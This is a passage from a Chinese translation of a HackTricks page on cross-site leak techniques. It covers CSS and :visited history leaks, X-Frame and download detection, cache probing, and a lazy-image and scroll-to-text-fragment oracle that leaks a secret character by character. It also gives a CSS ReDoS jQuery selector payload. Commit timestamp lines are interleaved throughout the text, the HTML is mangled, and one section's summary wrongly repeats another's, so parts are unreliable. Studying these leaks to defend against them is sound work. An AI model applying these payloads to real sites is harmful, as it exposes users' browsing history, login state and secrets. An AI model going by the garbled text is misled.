* **更多信息**: [https://xsleaks.dev/docs/attacks/element-leaks/#abusing-getcomputedstyle](https://xsleaks.dev/docs/attacks/element-leaks/#abusing-getcomputedstyle), [https://scarybeastsecurity.blogspot.com/2008/08/cross-domain-leaks-of-site-logins.html ](https://scarybeastsecurity.blogspot.com/2008/08/cross-domain-leaks-of-site-logins.html )
* **摘要**:识别与用户状态或状态相关的网站样式变化。
2023-08-03 19:12:22 +00:00
* **代码示例**: [https://xsinator.com/testing.html#CSS%20Property%20Leak](https://xsinator.com/testing.html#CSS%20Property%20Leak)
2022-06-28 12:20:37 +00:00
2024-02-09 08:09:21 +00:00
Web 应用程序可能根据用户状态更改**网站样式**。攻击者可以使用 **HTML 链接元素** 在攻击者页面上嵌入跨源 CSS 文件,并将规则应用于攻击者页面。如果页面动态更改这些规则,攻击者可以根据用户状态检测这些差异。\
作为一种泄漏技术,攻击者可以使用 `window.getComputedStyle` 方法来**读取特定 HTML 元素的 CSS** 属性。因此,如果已知受影响的元素和属性名称,攻击者可以读取任意 CSS 属性。
2022-06-28 12:20:37 +00:00
2024-02-06 04:10:34 +00:00
### CSS 历史
2022-06-28 15:48:43 +00:00
2024-02-06 04:10:34 +00:00
* **包含方法**: HTML 元素
2023-08-03 19:12:22 +00:00
* **可检测差异**:页面内容
* **更多信息**: [https://xsleaks.dev/docs/attacks/css-tricks/#retrieving-users-history](https://xsleaks.dev/docs/attacks/css-tricks/#retrieving-users-history)
2024-02-06 04:10:34 +00:00
* **摘要**:检测 `:visited` 样式是否应用于 URL, 指示其已被访问过
2023-08-03 19:12:22 +00:00
* **代码示例**: [http://blog.bawolff.net/2021/10/write-up-pbctf-2021-vault.html](http://blog.bawolff.net/2021/10/write-up-pbctf-2021-vault.html)
2023-01-02 23:15:01 +00:00
{% hint style="info" %}
2024-02-06 04:10:34 +00:00
根据[**这里**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/)的说法,在无头 Chrome 中这不起作用。
2023-01-02 23:15:01 +00:00
{% endhint %}
2022-06-28 15:48:43 +00:00
2024-02-09 08:09:21 +00:00
CSS `:visited` 选择器用于为已被用户访问过的 URL 设置不同样式。过去,可以使用 `getComputedStyle()` 方法来识别这些样式差异。然而,现代浏览器已经实施了安全措施,防止此方法揭示链接状态。这些措施包括始终返回计算样式,就像链接已被访问一样,并限制可以使用 `:visited` 选择器应用的样式。
2024-02-06 04:10:34 +00:00
尽管存在这些限制,仍然可以间接地辨别链接的访问状态。一种技术涉及欺骗用户与受 CSS 影响的区域进行交互,特别是利用 `mix-blend-mode` 属性。该属性允许元素与其背景混合,根据用户交互可能显示已访问状态。
2024-02-09 08:09:21 +00:00
此外,可以通过利用链接的渲染时间来实现无需用户交互的检测。由于浏览器可能以不同方式渲染已访问和未访问的链接,这可能会在渲染中引入可测量的时间差异。在 Chromium 缺陷报告中提到了一个概念验证( PoC) , 演示了使用多个链接放大时间差异的技术, 从而通过时间分析使已访问状态可通过检测。
2023-12-31 04:43:12 +00:00
2024-02-06 04:10:34 +00:00
有关这些属性和方法的更多详细信息,请访问它们的文档页面:
- `:visited` : [MDN 文档](https://developer.mozilla.org/en-US/docs/Web/CSS/:visited)
- `getComputedStyle()` : [MDN 文档](https://developer.mozilla.org/en-US/docs/Web/API/Window/getComputedStyle)
- `mix-blend-mode` : [MDN 文档](https://developer.mozilla.org/en-US/docs/Web/CSS/mix-blend-mode)
2022-06-28 12:20:37 +00:00
2024-02-06 04:10:34 +00:00
### ContentDocument X-Frame 泄漏
* **包含方法**:帧
* **可检测差异**:标头
2023-08-03 19:12:22 +00:00
* **更多信息**: [https://www.ndss-symposium.org/wp-content/uploads/2020/02/24278-paper.pdf](https://www.ndss-symposium.org/wp-content/uploads/2020/02/24278-paper.pdf)
2024-02-06 04:10:34 +00:00
* **摘要**:在 Google Chrome 中,当由于 X-Frame-Options 限制而阻止页面嵌入到跨源站点时,会显示专用错误页面。
2023-08-03 19:12:22 +00:00
* **代码示例**: [https://xsinator.com/testing.html#ContentDocument%20X-Frame%20Leak](https://xsinator.com/testing.html#ContentDocument%20X-Frame%20Leak)
2022-06-28 12:20:37 +00:00
2024-02-09 08:09:21 +00:00
在 Chrome 中,如果页面的 `X-Frame-Options` 标头设置为 "deny" 或 "same-origin" 并作为对象嵌入,将显示错误页面。与 iframe 或其他浏览器不同, Chrome 对此对象的 `contentDocument` 属性返回空文档对象(而不是 `null` )。攻击者可以利用此功能检测空文档,可能揭示有关用户状态的信息,特别是如果开发人员不一致地设置 X-Frame-Options 标头,通常忽视错误页面。意识到并一致应用安全标头对于防止此类泄漏至关重要。
2022-06-28 12:20:37 +00:00
2023-08-03 19:12:22 +00:00
### 下载检测
2022-06-28 12:20:37 +00:00
2024-02-06 04:10:34 +00:00
* **包含方法**:帧、弹出窗口
* **可检测差异**:标头
2023-08-03 19:12:22 +00:00
* **更多信息**: [https://xsleaks.dev/docs/attacks/navigations/#download-trigger](https://xsleaks.dev/docs/attacks/navigations/#download-trigger)
2024-02-06 04:10:34 +00:00
* **摘要**:攻击者可以利用 iframe 区分文件下载; iframe 的持续可访问性意味着成功的文件下载。
2023-08-03 19:12:22 +00:00
* **代码示例**: [https://xsleaks.dev/docs/attacks/navigations/#download-bar](https://xsleaks.dev/docs/attacks/navigations/#download-bar)
2022-06-28 12:20:37 +00:00
2024-02-06 04:10:34 +00:00
`Content-Disposition` 标头,特别是 `Content-Disposition: attachment` ,指示浏览器下载内容而不是内联显示。这种行为可用于检测用户是否可以访问触发文件下载的页面。在基于 Chromium 的浏览器中,有一些技术可用于检测此下载行为:
2022-06-28 12:20:37 +00:00
2024-02-06 04:10:34 +00:00
1. **下载栏监控** :
- 当在基于 Chromium 的浏览器中下载文件时,会在浏览器窗口底部出现下载栏。
- 通过监视窗口高度的变化,攻击者可以推断下载栏的出现,表明已启动下载。
2022-06-28 12:20:37 +00:00
2024-02-06 04:10:34 +00:00
2. **使用 iframe 进行下载导航** :
- 当页面使用 `Content-Disposition: attachment` 标头触发文件下载时,不会导致导航事件。
- 通过在 iframe 中加载内容并监视导航事件,可以检查内容设置是否导致文件下载(无导航)。
2022-06-28 12:20:37 +00:00
2024-02-06 04:10:34 +00:00
3. **不使用 iframe 进行下载导航** :
2024-02-09 08:09:21 +00:00
- 类似于 iframe 技术,此方法涉及使用 `window.open` 而不是 iframe。
- 监视新打开窗口中的导航事件可以揭示是否触发了文件下载(无导航)或内容内联显示(发生导航)。
2022-06-28 12:20:37 +00:00
2024-02-06 04:10:34 +00:00
在仅允许登录用户触发此类下载的情况下,这些技术可用于间接推断用户的身份验证状态,根据浏览器对下载请求的响应。
2022-06-28 12:20:37 +00:00
2024-02-06 04:10:34 +00:00
### 分区 HTTP 缓存绕过 <a href="#partitioned-http-cache-bypass" id="partitioned-http-cache-bypass"></a>
2022-06-27 16:53:32 +00:00
2023-08-03 19:12:22 +00:00
* **包含方法**:弹出窗口
2023-09-28 19:47:23 +00:00
* **可检测差异**:时间
2023-08-03 19:12:22 +00:00
* **更多信息**: [https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass](https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass)
2024-02-06 04:10:34 +00:00
* **摘要**:攻击者可以利用 iframe 区分文件下载; iframe 的持续可访问性意味着成功的文件下载。
* **代码示例**: [https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass](https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass), [https://gist.github.com/aszx87410/e369f595edbd0f25ada61a8eb6325722 ](https://gist.github.com/aszx87410/e369f595edbd0f25ada61a8eb6325722 )(来自[https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/))
2022-07-03 09:52:15 +00:00
{% hint style="warning" %}
2024-02-09 08:09:21 +00:00
这就是这项技术有趣的原因: Chrome 现在具有**缓存分区**,新打开页面的缓存密钥是:`(https://actf.co, https://actf.co, https://sustenance.web.actf.co/?m =xxx)`,但如果我打开一个 ngrok 页面并在其中使用 fetch, 缓存密钥将是: `(https://myip.ngrok.io, https://myip.ngrok.io, https://sustenance.web.actf.co/?m=xxx)`, **缓存密钥不同**,因此无法共享缓存。您可以在这里找到更多详细信息:[通过分区缓存获得安全性和隐私性](https://developer.chrome.com/blog/http-cache-partitioning/)\
2024-02-06 04:10:34 +00:00
(来自[**这里**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/)的评论)
2022-07-03 09:52:15 +00:00
{% endhint %}
2022-06-27 16:53:32 +00:00
2024-02-09 08:09:21 +00:00
如果站点 `example.com` 包含来自 `*.example.com/resource` 的资源,则该资源将具有与直接通过顶级导航请求资源相同的**缓存密钥**。这是因为缓存密钥由顶级 _eTLD+1_ 和框架 _eTLD+1_ 组成。
2022-06-27 16:53:32 +00:00
2024-02-06 04:10:34 +00:00
由于访问缓存比加载资源更快,可以尝试更改页面位置并在停止后取消 20 毫秒(例如)后。如果停止后原点发生了变化,则表示资源已被缓存。\
2024-02-09 08:09:21 +00:00
或者可以**向可能已缓存的页面发送一些 fetch 并测量加载所需的时间**。
2022-06-27 17:09:07 +00:00
2023-12-31 04:43:12 +00:00
### 手动重定向 <a href="#fetch-with-abortcontroller" id="fetch-with-abortcontroller"></a>
2022-06-28 17:21:21 +00:00
2023-08-03 19:12:22 +00:00
* **包含方法**: Fetch API
2023-09-28 19:47:23 +00:00
* **可检测差异**:重定向
2024-02-06 04:10:34 +00:00
* **更多信息**: [ttps://docs.google.com/presentation/d/1rlnxXUYHY9CHgCMckZsCGH4VopLo4DYMvAcOltma0og/edit#slide=id.gae7bf0b4f7\_0\_1234](https://docs.google.com/presentation/d/1rlnxXUYHY9CHgCMckZsCGH4VopLo4DYMvAcOltma0og/edit#slide=id.gae7bf0b4f7\_0\_1234)
* **摘要**:可以查明对 fetch 请求的响应是否是重定向
2023-08-03 19:12:22 +00:00
* **代码示例**:
2022-06-28 17:21:21 +00:00
![](< .. / . gitbook / assets / image ( 652 ) . png > )
2023-12-31 04:43:12 +00:00
### 使用 AbortController 的 Fetch <a href="#fetch-with-abortcontroller" id="fetch-with-abortcontroller"></a>
* **包含方法**: Fetch API
* **可检测差异**:时间
* **更多信息**: [https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller](https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller)
2024-02-09 08:09:21 +00:00
* **摘要**:可以尝试加载资源并在加载之前中止加载。根据是否触发错误,可以确定资源是否已缓存。
2023-12-31 04:43:12 +00:00
* **代码示例**: [https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller](https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller)
2022-06-27 16:53:32 +00:00
2024-02-09 08:09:21 +00:00
使用 _**fetch**_ 和
2022-06-27 23:34:20 +00:00
```html
< img src = /something loading = lazy >
```
2024-02-09 08:09:21 +00:00
因此,您可以**添加大量的垃圾字符**(例如**成千上万个"W"**)来**填充网页**,使其在秘密信息之前或之后添加类似于**`< br > < canvas height = "1850px" > < / canvas > < br > `**的内容。\
如果,例如,我们的**注入出现在标志之前**,则**图像**将被**加载**,但如果出现在**标志之后**,标志加上垃圾字符将**阻止其加载**(您需要调整放置多少垃圾字符)。这就是[**这篇文章**](https://blog.huli.tw/2022/10/08/en/sekaictf2022-safelist-and-connection/)中发生的情况。
2023-08-16 09:07:58 +00:00
2024-02-06 04:10:34 +00:00
另一个选择是使用**scroll-to-text-fragment**(如果允许):
2020-07-15 15:43:14 +00:00
2024-02-06 04:10:34 +00:00
#### 滚动到文本片段
2023-08-16 09:07:58 +00:00
2024-02-09 08:09:21 +00:00
但是,您可以让**机器人访问页面**,例如:
2021-10-18 11:21:18 +00:00
```
2022-06-27 23:34:20 +00:00
#:~:text=SECR
2020-07-15 15:43:14 +00:00
```
2024-02-06 04:10:34 +00:00
所以网页将是这样的:**`https://victim.com/post.html#:~:text=SECR`**
2020-07-15 15:43:14 +00:00
2024-02-06 04:10:34 +00:00
其中post.html包含攻击者的垃圾字符和延迟加载图像, 然后机器人的秘密被添加。
2020-07-15 15:43:14 +00:00
2024-02-09 08:09:21 +00:00
这段文本的作用是让机器人访问页面中包含文本`SECR`的任何文本。由于该文本是秘密,而且它就在**图像下方**, **只有在猜测的秘密正确时图像才会加载**。因此,您可以利用这个“神谕”**逐个字符地泄露秘密**。
2020-07-15 15:43:14 +00:00
2024-02-06 04:10:34 +00:00
一些利用此漏洞的代码示例:[https://gist.github.com/jorgectf/993d02bdadb5313f48cf1dc92a7af87e](https://gist.github.com/jorgectf/993d02bdadb5313f48cf1dc92a7af87e)
2020-07-15 15:43:14 +00:00
2024-02-06 04:10:34 +00:00
### 图像延迟加载基于时间
2023-08-16 09:07:58 +00:00
2024-02-09 08:09:21 +00:00
如果**无法加载外部图像**以指示攻击者图像已加载,另一个选择是尝试**多次猜测字符并测量时间**。如果加载了图像,所有请求都会比未加载图像时花费更长的时间。这就是[**此解决方案的写作中使用的方法**](https://blog.huli.tw/2022/10/08/en/sekaictf2022-safelist-and-connection/) **在这里总结:**
2022-10-12 19:31:39 +00:00
{% content-ref url="xs-search/event-loop-blocking-+-lazy-images.md" %}
[event-loop-blocking-+-lazy-images.md ](xs-search/event-loop-blocking-+-lazy-images.md )
{% endcontent-ref %}
2022-06-28 15:48:43 +00:00
### ReDoS
2020-07-15 15:43:14 +00:00
2022-06-28 15:48:43 +00:00
{% content-ref url="regular-expression-denial-of-service-redos.md" %}
[regular-expression-denial-of-service-redos.md ](regular-expression-denial-of-service-redos.md )
2022-06-27 23:34:20 +00:00
{% endcontent-ref %}
2022-06-28 15:48:43 +00:00
### CSS ReDoS
2020-07-15 15:43:14 +00:00
2024-02-09 08:09:21 +00:00
如果使用`jQuery(location.hash)`,可以通过时间来找出**某些HTML内容是否存在**,这是因为如果选择器`main[id='site-main']`不匹配,则无需检查其余的**选择器**:
2022-06-28 15:48:43 +00:00
```javascript
$("*:has(*:has(*:has(*)) *:has(* :has(*:has(*))) *:has(* :has(*:has(*)))) main[id='site-main']")
```
2023-08-03 19:12:22 +00:00
### CSS注入
2020-07-15 15:43:14 +00:00
2022-06-28 15:48:43 +00:00
{% content-ref url="xs-search/css-injection/" %}
[css-injection ](xs-search/css-injection/ )
{% endcontent-ref %}
2020-07-15 15:43:14 +00:00
2024-02-06 04:10:34 +00:00
## 防御
2020-07-15 15:43:14 +00:00
2024-02-09 08:09:21 +00:00
建议在[https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf)中提供了缓解措施,同时在[https://xsleaks.dev/](https://xsleaks.dev/)的每个部分中也有。请查看这些信息,了解如何防范这些技术。
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
## 参考资料
2020-07-15 15:43:14 +00:00
2022-06-28 15:48:43 +00:00
* [https://xsinator.com/paper.pdf ](https://xsinator.com/paper.pdf )
2022-06-27 23:34:20 +00:00
* [https://xsleaks.dev/ ](https://xsleaks.dev )
* [https://github.com/xsleaks/xsleaks ](https://github.com/xsleaks/xsleaks )
* [https://xsinator.com/ ](https://xsinator.com/ )
* [https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle ](https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle )
2022-04-28 16:01:33 +00:00
< details >
2024-02-09 08:09:21 +00:00
< summary > < strong > 从零开始学习AWS黑客技术< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE( HackTricks AWS Red Team Expert) < / strong > < / a > < strong > ! < / strong > < / summary >
2023-12-31 04:43:12 +00:00
支持HackTricks的其他方式:
2022-04-28 16:01:33 +00:00
2024-02-06 04:10:34 +00:00
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
2024-02-09 08:09:21 +00:00
* **加入** 💬 [**Discord群组** ](https://discord.gg/hRep4RUj7f ) 或 [**电报群组** ](https://t.me/peass ) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks_live )**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来**分享您的黑客技巧**。
2022-04-28 16:01:33 +00:00
< / details >
2022-08-31 22:35:39 +00:00
2024-02-06 04:10:34 +00:00
< figure > < img src = "../.gitbook/assets/image (3) (1) (1) (1) (1) (1).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-08-31 22:35:39 +00:00
\
2024-02-09 08:09:21 +00:00
使用[**Trickest**](https://trickest.com/?utm_campaign=hacktrics& utm_medium=banner& utm_source=hacktricks)可以轻松构建和**自动化工作流程**,利用世界上**最先进**的社区工具。\
2023-08-03 19:12:22 +00:00
立即获取访问权限:
2022-08-31 22:35:39 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics& utm_medium=banner& utm_source=hacktricks" %}